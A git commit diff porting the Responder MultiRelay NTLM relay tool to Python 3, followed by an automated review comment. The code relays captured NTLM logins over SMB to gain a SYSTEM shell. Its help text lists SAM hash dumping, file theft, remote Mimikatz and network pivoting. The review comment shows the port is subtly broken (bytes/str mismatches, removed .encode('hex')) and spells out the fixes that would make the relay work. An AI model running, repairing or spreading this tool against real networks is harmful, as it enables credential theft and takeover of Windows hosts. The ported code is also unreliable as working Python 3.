Updated MultiRelay and associated files for use with Python3

nbadev2 2020-12-30 16:25:31 -05:00
commit 65971d14ea
4 changed files with 338 additions and 338 deletions


@ -23,17 +23,17 @@ import time
import random import random
import subprocess import subprocess
from threading import Thread from threading import Thread
from SocketServer import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler from socketserver import TCPServer, UDPServer, ThreadingMixIn, BaseRequestHandler
try: try:
from Crypto.Hash import MD5 from Crypto.Hash import MD5
except ImportError: except ImportError:
print "\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes." print ("\033[1;31m\nCrypto lib is not installed. You won't be able to live dump the hashes.")
print "You can install it on debian based os with this command: apt-get install python-crypto" print ("You can install it on debian based os with this command: apt-get install python-crypto")
print "The Sam file will be saved anyway and you will have the bootkey.\033[0m\n" print ("The Sam file will be saved anyway and you will have the bootkey.\033[0m\n")
try: try:
import readline import readline
except: except:
print "Warning: readline module is not available, you will not be able to use the arrow keys for command history" print ("Warning: readline module is not available, you will not be able to use the arrow keys for command history")
pass pass
from MultiRelay.RelayMultiPackets import * from MultiRelay.RelayMultiPackets import *
from MultiRelay.RelayMultiCore import * from MultiRelay.RelayMultiCore import *
@ -72,18 +72,18 @@ parser.add_option('-d', '--dump', action="store_true", help="Dump hashes (script
options, args = parser.parse_args() options, args = parser.parse_args()
if options.TARGET is None: if options.TARGET is None:
print "\n-t Mandatory option is missing, please provide a target.\n" print ("\n-t Mandatory option is missing, please provide a target.\n")
parser.print_help() parser.print_help()
exit(-1) exit(-1)
if options.UserToRelay is None: if options.UserToRelay is None:
print "\n-u Mandatory option is missing, please provide a username to relay.\n" print ("\n-u Mandatory option is missing, please provide a username to relay.\n")
parser.print_help() parser.print_help()
exit(-1) exit(-1)
if options.ExtraPort is None: if options.ExtraPort is None:
options.ExtraPort = 0 options.ExtraPort = 0
if not os.geteuid() == 0: if not os.geteuid() == 0:
print color("[!] MultiRelay must be run as root.") print (color("[!] MultiRelay must be run as root."))
sys.exit(-1) sys.exit(-1)
OneCommand = options.OneCommand OneCommand = options.OneCommand
@ -98,46 +98,46 @@ Pivoting = [2]
def color(txt, code = 1, modifier = 0): def color(txt, code = 1, modifier = 0):
return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt) return "\033[%d;3%dm%s\033[0m" % (modifier, code, txt)
def ShowWelcome(): def ShowWelcome():
print color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1) print (color('\nResponder MultiRelay %s NTLMv1/2 Relay' %(__version__),8,1))
print '\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com' print ('\nSend bugs/hugs/comments to: laurent.gaffie@gmail.com')
print 'Usernames to relay (-u) are case sensitive.' print ('Usernames to relay (-u) are case sensitive.')
print 'To kill this script hit CTRL-C.\n' print ('To kill this script hit CTRL-C.\n')
print color('/*',8,1) print (color('/*',8,1))
print 'Use this script in combination with Responder.py for best results.' print ('Use this script in combination with Responder.py for best results.')
print 'Make sure to set SMB and HTTP to OFF in Responder.conf.\n' print ('Make sure to set SMB and HTTP to OFF in Responder.conf.\n')
print 'This tool listen on TCP port 80, 3128 and 445.' print ('This tool listen on TCP port 80, 3128 and 445.')
print 'For optimal pwnage, launch Responder only with these 2 options:' print ('For optimal pwnage, launch Responder only with these 2 options:')
print '-rv\nAvoid running a command that will likely prompt for information like net use, etc.' print ('-rv\nAvoid running a command that will likely prompt for information like net use, etc.')
print 'If you do so, use taskkill (as system) to kill the process.' print ('If you do so, use taskkill (as system) to kill the process.')
print color('*/',8,1) print (color('*/',8,1))
print color('\nRelaying credentials for these users:',8,1) print (color('\nRelaying credentials for these users:',8,1))
print color(UserToRelay,4,1) print (color(UserToRelay,4,1))
print '\n' print ('\n')
ShowWelcome() ShowWelcome()
def ShowHelp(): def ShowHelp():
print color('Available commands:',8,0) print (color('Available commands:',8,0))
print color('dump',8,1)+' -> Extract the SAM database and print hashes.' print (color('dump',8,1)+' -> Extract the SAM database and print hashes.')
print color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)' print (color('regdump KEY',8,1)+' -> Dump an HKLM registry key (eg: regdump SYSTEM)')
print color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)' print (color('read Path_To_File',8,1)+' -> Read a file (eg: read /windows/win.ini)')
print color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)' print (color('get Path_To_File',8,1)+' -> Download a file (eg: get users/administrator/desktop/password.txt)')
print color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)' print (color('delete Path_To_File',8,1)+'-> Delete a file (eg: delete /windows/temp/executable.exe)')
print color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\' print (color('upload Path_To_File',8,1)+'-> Upload a local file (eg: upload /home/user/bk.exe), files will be uploaded in \\windows\\temp\\')
print color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)' print (color('runas Command',8,1)+' -> Run a command as the currently logged in user. (eg: runas whoami)')
print color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to' print (color('scan /24',8,1)+' -> Scan (Using SMB) this /24 or /16 to find hosts to pivot to')
print color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)' print (color('pivot IP address',8,1)+' -> Connect to another host (eg: pivot 10.0.0.12)')
print color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)' print (color('mimi command',8,1)+' -> Run a remote Mimikatz 64 bits command (eg: mimi coffee)')
print color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)' print (color('mimi32 command',8,1)+' -> Run a remote Mimikatz 32 bits command (eg: mimi coffee)')
print color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)' print (color('lcmd command',8,1)+' -> Run a local command and display the result in MultiRelay shell (eg: lcmd ifconfig)')
print color('help',8,1)+' -> Print this message.' print (color('help',8,1)+' -> Print this message.')
print color('exit',8,1)+' -> Exit this shell and return in relay mode.' print (color('exit',8,1)+' -> Exit this shell and return in relay mode.')
print ' If you want to quit type exit and then use CTRL-C\n' print (' If you want to quit type exit and then use CTRL-C\n')
print color('Any other command than that will be run as SYSTEM on the target.\n',8,1) print (color('Any other command than that will be run as SYSTEM on the target.\n',8,1))
Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../" Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../"
Logs = logging Logs = logging
@ -153,7 +153,7 @@ def UploadContent(File):
try: try:
RunFinger(Host[0]) RunFinger(Host[0])
except: except:
print "The host %s seems to be down or port 445 down."%(Host[0]) print ("The host %s seems to be down or port 445 down."%(Host[0]))
sys.exit(1) sys.exit(1)
@ -190,7 +190,7 @@ def ConnectToTarget():
except: except:
try: try:
sys.exit(1) sys.exit(1)
print "Cannot connect to target, host down?" print ("Cannot connect to target, host down?")
except: except:
pass pass
@ -219,45 +219,45 @@ class HTTPProxyRelay(BaseRequestHandler):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407. ##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth: if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth) #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01": if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData()) n = SMBNegoCairo(Data = SMBNegoCairoData())
n.calculate() n.calculate()
packet0 = str(h)+str(n) packet0 = str(h)+str(n)
buffer0 = longueur(packet0)+packet0 buffer0 = longueur(packet0)+packet0
s.send(buffer0) s.send(buffer0)
smbdata = s.recv(2048) smbdata = s.recv(2048)
##Session Setup AndX Request, NTLMSSP_NEGOTIATE ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
if smbdata[8:10] == "\x72\x00": if smbdata[8:10] == "\x72\x00":
head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00") head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x43\xc8",mid="\x02\x00")
t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))# t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(2048) #got it here. smbdata = s.recv(2048) #got it here.
## Send HTTP Proxy ## Send HTTP Proxy
Buffer_Ans = WPAD_NTLM_Challenge_Ans() Buffer_Ans = WPAD_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing). key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092) data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client. ##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03": if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client. ##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth): if IsSMBAnonymous(NTLM_Auth):
Response = WPAD_Auth_407_Ans() Response = WPAD_Auth_407_Ans()
self.request.send(str(Response)) self.request.send(str(Response))
data = self.request.recv(8092) data = self.request.recv(8092)
else: else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
@ -270,24 +270,24 @@ class HTTPProxyRelay(BaseRequestHandler):
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent." print ("[+] SMB Session Auth sent.")
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(2048) smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None: if RunCmd is None:
s.close() s.close()
self.request.close() self.request.close()
return None return None
else: else:
##Any other type of request, send a 407. ##Any other type of request, send a 407.
Response = WPAD_Auth_407_Ans() Response = WPAD_Auth_407_Ans()
self.request.send(str(Response)) self.request.send(str(Response))
except Exception: except Exception:
self.request.close() self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console.. ##No need to print anything (timeouts, rst, etc) to the user console..
pass pass
class HTTPRelay(BaseRequestHandler): class HTTPRelay(BaseRequestHandler):
@ -316,11 +316,11 @@ class HTTPRelay(BaseRequestHandler):
NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
##Make sure incoming packet is an NTLM auth, if not send HTTP 407. ##Make sure incoming packet is an NTLM auth, if not send HTTP 407.
if NTLM_Auth: if NTLM_Auth:
#Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth) #Get NTLM Message code. (1:negotiate, 2:challenge, 3:auth)
Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9] Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
if Packet_NTLM == "\x01": if Packet_NTLM == "\x01":
## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target. ## SMB Block. Once we get an incoming NTLM request, we grab the ntlm challenge from the target.
h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8") h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x43\xc8")
n = SMBNegoCairo(Data = SMBNegoCairoData()) n = SMBNegoCairo(Data = SMBNegoCairoData())
@ -340,21 +340,21 @@ class HTTPRelay(BaseRequestHandler):
smbdata = s.recv(2048) #got it here. smbdata = s.recv(2048) #got it here.
## Send HTTP Response. ## Send HTTP Response.
Buffer_Ans = IIS_NTLM_Challenge_Ans() Buffer_Ans = IIS_NTLM_Challenge_Ans()
Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing). key = ExtractHTTPChallenge(smbdata,Pivoting)#Grab challenge key for later use (hash parsing).
self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client. self.request.send(str(Buffer_Ans)) #We send NTLM message 2 to the client.
data = self.request.recv(8092) data = self.request.recv(8092)
NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data) NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9] Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
##Got NTLM Message 3 from client. ##Got NTLM Message 3 from client.
if Packet_NTLM == "\x03": if Packet_NTLM == "\x03":
NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth)) NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
##Might be anonymous, verify it and if so, send no go to client. ##Might be anonymous, verify it and if so, send no go to client.
if IsSMBAnonymous(NTLM_Auth): if IsSMBAnonymous(NTLM_Auth):
Response = IIS_Auth_401_Ans() Response = IIS_Auth_401_Ans()
self.request.send(str(Response)) self.request.send(str(Response))
data = self.request.recv(8092) data = self.request.recv(8092)
else: else:
#Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login #Let's send that NTLM auth message to ParseSMBHash which will make sure this user is allowed to login
@ -367,25 +367,25 @@ class HTTPRelay(BaseRequestHandler):
t.calculate() t.calculate()
packet1 = str(head)+str(t) packet1 = str(head)+str(t)
buffer1 = longueur(packet1)+packet1 buffer1 = longueur(packet1)+packet1
print "[+] SMB Session Auth sent." print ("[+] SMB Session Auth sent.")
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(2048) smbdata = s.recv(2048)
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
if RunCmd is None: if RunCmd is None:
s.close() s.close()
self.request.close() self.request.close()
return None return None
else: else:
##Any other type of request, send a 401. ##Any other type of request, send a 401.
Response = IIS_Auth_401_Ans() Response = IIS_Auth_401_Ans()
self.request.send(str(Response)) self.request.send(str(Response))
except Exception: except Exception:
self.request.close() self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console.. ##No need to print anything (timeouts, rst, etc) to the user console..
pass pass
class SMBRelay(BaseRequestHandler): class SMBRelay(BaseRequestHandler):
@ -456,11 +456,11 @@ class SMBRelay(BaseRequestHandler):
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] SMB Session Auth sent." print ("[+] SMB Session Auth sent.")
s.send(buffer1) s.send(buffer1)
smbdata = s.recv(4096) smbdata = s.recv(4096)
#We're all set, dropping into shell. #We're all set, dropping into shell.
RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain) RunCmd = RunShellCmd(smbdata, s, self.client_address[0], Host, Username, Domain)
#If runcmd is None it's because tree connect was denied for this user. #If runcmd is None it's because tree connect was denied for this user.
#This will only happen once with that specific user account. #This will only happen once with that specific user account.
#Let's kill that connection so we can force him to reauth with another account. #Let's kill that connection so we can force him to reauth with another account.
@ -480,9 +480,9 @@ class SMBRelay(BaseRequestHandler):
return None return None
except Exception: except Exception:
self.request.close() self.request.close()
##No need to print anything (timeouts, rst, etc) to the user console.. ##No need to print anything (timeouts, rst, etc) to the user console..
pass pass
#Interface starts here. #Interface starts here.
@ -499,20 +499,20 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
# On this block we do some verifications before dropping the user into the shell. # On this block we do some verifications before dropping the user into the shell.
if data[8:10] == "\x73\x6d": if data[8:10] == "\x73\x6d":
print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target." print ("[+] Relay failed, Logon Failure. This user doesn't have an account on this target.")
print "[+] Hashes were saved anyways in Responder/logs/ folder.\n" print ("[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:] del ShellOpen[:]
return False return False
if data[8:10] == "\x73\x8d": if data[8:10] == "\x73\x8d":
print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n" print ("[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:] del ShellOpen[:]
return False return False
if data[8:10] == "\x73\x5e": if data[8:10] == "\x73\x5e":
print "[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n" print ("[+] Relay failed, NO_LOGON_SERVER returned. Credentials are probably good, but the PDC is either offline or inexistant.\n")
del ShellOpen[:] del ShellOpen[:]
return False return False
@ -533,14 +533,14 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n" print ("[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n")
Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure") Logs.info(clientIP+":"+Username+":"+Domain+":"+Target[0]+":Logon Failure")
del ShellOpen[:] del ShellOpen[:]
return False return False
# This one should not happen since we always use the IP address of the target in our tree connects, but just in case.. # This one should not happen since we always use the IP address of the target in our tree connects, but just in case..
if data[8:10] == "\x75\xcc": if data[8:10] == "\x75\xcc":
print "[+] Tree Connect AndX denied. Bad Network Name returned." print ("[+] Tree Connect AndX denied. Bad Network Name returned.")
del ShellOpen[:] del ShellOpen[:]
return False return False
@ -549,7 +549,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Looks good, "+Username+" has admin rights on C$." print ("[+] Looks good, "+Username+" has admin rights on C$.")
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$") t = SMBTreeConnectData(Path="\\\\"+Target[0]+"\\IPC$")
t.calculate() t.calculate()
@ -560,12 +560,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
## Run one command. ## Run one command.
if data[8:10] == "\x75\x00" and OneCommand != None or Dump: if data[8:10] == "\x75\x00" and OneCommand != None or Dump:
print "[+] Authenticated." print ("[+] Authenticated.")
if OneCommand != None: if OneCommand != None:
print "[+] Running command: %s"%(OneCommand) print ("[+] Running command: %s"%(OneCommand))
RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0]) RunCmd(data, s, clientIP, Username, Domain, OneCommand, Logs, Target[0])
if Dump: if Dump:
print "[+] Dumping hashes" print ("[+] Dumping hashes")
DumpHashes(data, s, Target[0]) DumpHashes(data, s, Target[0])
os._exit(1) os._exit(1)
@ -574,10 +574,10 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
if Pivoting[0] == "1": if Pivoting[0] == "1":
pass pass
else: else:
print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n" print ("[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n")
ShowHelp() ShowHelp()
Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired") Logs.info("Client:"+clientIP+", "+Domain+"\\"+Username+" --> Target: "+Target[0]+" -> Shell acquired")
print color('Connected to %s as LocalSystem.'%(Target[0]),2,1) print (color('Connected to %s as LocalSystem.'%(Target[0]),2,1))
while True: while True:
@ -617,7 +617,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
Help = re.findall('^help', Cmd[0]) Help = re.findall('^help', Cmd[0])
if Cmd[0] == "exit": if Cmd[0] == "exit":
print "[+] Returning in relay mode." print ("[+] Returning in relay mode.")
del Cmd[:] del Cmd[:]
del ShellOpen[:] del ShellOpen[:]
return None return None
@ -647,7 +647,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = WriteFile(data, s, File, FileSize, FileContent, Target[0]) data = WriteFile(data, s, File, FileSize, FileContent, Target[0])
del Cmd[:] del Cmd[:]
else: else:
print File+" does not exist, please specify a valid file." print (File+" does not exist, please specify a valid file.")
del Cmd[:] del Cmd[:]
if Delete: if Delete:
@ -669,7 +669,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName) data = RunAsCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0], FileName)
del Cmd[:] del Cmd[:]
else: else:
print RunAsFileName+" does not exist, please specify a valid file." print (RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:] del Cmd[:]
if LCmd: if LCmd:
@ -685,7 +685,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName) data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:] del Cmd[:]
else: else:
print MimikatzFilename+" does not exist, please specify a valid file." print (MimikatzFilename+" does not exist, please specify a valid file.")
del Cmd[:] del Cmd[:]
if Mimi32: if Mimi32:
@ -697,12 +697,12 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName) data = RunMimiCmd(data, s, clientIP, Username, Domain, Exec, Logs, Target[0],FileName)
del Cmd[:] del Cmd[:]
else: else:
print Mimikatzx86Filename+" does not exist, please specify a valid file." print (Mimikatzx86Filename+" does not exist, please specify a valid file.")
del Cmd[:] del Cmd[:]
if Pivot: if Pivot:
if Pivot[0] == Target[0]: if Pivot[0] == Target[0]:
print "[Pivot Verification Failed]: You're already on this host. No need to pivot." print ("[Pivot Verification Failed]: You're already on this host. No need to pivot.")
del Pivot[:] del Pivot[:]
del Cmd[:] del Cmd[:]
else: else:
@ -718,7 +718,7 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName) Status, data = VerifyPivot(data, s, clientIP, Username, Domain, Pivot[0], Logs, Target[0], RunAsPath, FileName)
if Status == True: if Status == True:
print "[+] Pivoting to %s."%(Pivot[0]) print ("[+] Pivoting to %s."%(Pivot[0]))
if os.path.isfile(RunAsFileName): if os.path.isfile(RunAsFileName):
FileSize, FileContent = UploadContent(RunAsFileName) FileSize, FileContent = UploadContent(RunAsFileName)
data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0]) data = WriteFile(data, s, FileName, FileSize, FileContent, Target[0])
@ -734,11 +734,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
return None return None
if Status == False: if Status == False:
print "[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host." print ("[Pivot Verification Failed]: This user doesn't have enough privileges on "+Pivot[0]+" to pivot. Try another host.")
del Cmd[:] del Cmd[:]
del Pivot[:] del Pivot[:]
else: else:
print RunAsFileName+" does not exist, please specify a valid file." print (RunAsFileName+" does not exist, please specify a valid file.")
del Cmd[:] del Cmd[:]
if Scan: if Scan:
@ -762,11 +762,11 @@ def RunShellCmd(data, s, clientIP, Target, Username, Domain):
data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName) data = RunCmd(data, s, clientIP, Username, Domain, Cmd[0], Logs, Target[0], RunPath,FileName)
del Cmd[:] del Cmd[:]
else: else:
print SysSVCFileName+" does not exist, please specify a valid file." print (SysSVCFileName+" does not exist, please specify a valid file.")
del Cmd[:] del Cmd[:]
if data is None: if data is None:
print "\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n" print ("\033[1;31m\nSomething went wrong, the server dropped the connection.\nMake sure (\\Windows\\Temp\\) is clean on the server\033[0m\n")
if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop. if data[8:10] == "\x2d\x34":#We confirmed with OpenAndX that no file remains after the execution of the last command. We send a tree connect IPC and land at the begining of the command loop.
head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30]) head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
@ -789,7 +789,7 @@ def serve_thread_tcp(host, port, handler):
server = ThreadingTCPServer((host, port), handler) server = ThreadingTCPServer((host, port), handler)
server.serve_forever() server.serve_forever()
except: except:
print color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1) print (color('Error starting TCP server on port '+str(port)+ ', check permissions or other servers running.', 1, 1))
def main(): def main():
try: try:
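Review bot: In the HTTPProxyRelay hunk (`@ -219,45`), `data` is the bytes object returned by `self.request.recv(8092)` but it is still matched with a str pattern, `re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)`, which raises TypeError on Python 3; the `except Exception: self.request.close(); pass` at the end of the same handler then swallows it, so every proxied request is dropped with no message. The same bytes/str mismatch survives on `if Packet_NTLM == "\x01":` (a one-byte slice of the `b64decode` output compared with a str literal, never equal on Python 3), on `smbdata[8:10] == "\x72\x00"`, on the `data[8:10] == "\x73\x6d"`-style checks throughout RunShellCmd, and in the HTTPRelay and SMBRelay hunks, while the RelayMultiCore section still calls `.encode('hex')`/`.encode("hex")`, which str no longer has. Switching those literals and patterns to bytes (`rb'(?<=Authorization: NTLM )[^\r]*'`, `b"\x01"`, `b"\x72\x00"`) and using `binascii.hexlify(...)`/`bytes.hex()` for the hex encoding would make the port actually exercise the relay paths rather than fail silently. Since the broad handler `except Exception` hides exactly this class of porting error, logging the exception there instead of `pass` would have surfaced it. The enclosing handler methods and RunShellCmd start outside their hunks.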


@ -24,7 +24,7 @@ import re
import datetime import datetime
import threading import threading
import uuid import uuid
from RelayMultiPackets import * from MultiRelay.RelayMultiPackets import *
from odict import OrderedDict from odict import OrderedDict
from base64 import b64decode, b64encode from base64 import b64decode, b64encode
sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'creddump'))) sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), 'creddump')))
@ -57,17 +57,17 @@ class Packet():
# Function used to write captured hashs to a file. # Function used to write captured hashs to a file.
def WriteData(outfile, data, user): def WriteData(outfile, data, user):
if not os.path.isfile(outfile): if not os.path.isfile(outfile):
with open(outfile,"w") as outf: with open(outfile,"w") as outf:
outf.write(data + '\n') outf.write(data + '\n')
return return
with open(outfile,"r") as filestr: with open(outfile,"r") as filestr:
if re.search(user.encode('hex'), filestr.read().encode('hex')): if re.search(user.encode('hex'), filestr.read().encode('hex')):
return False return False
elif re.search(re.escape("$"), user): elif re.search(re.escape("$"), user):
return False return False
with open(outfile,"a") as outf2: with open(outfile,"a") as outf2:
outf2.write(data + '\n') outf2.write(data + '\n')
#Function used to verify if a previous auth attempt was made. #Function used to verify if a previous auth attempt was made.
def ReadData(Outfile, Client, User, Domain, Target, cmd): def ReadData(Outfile, Client, User, Domain, Target, cmd):
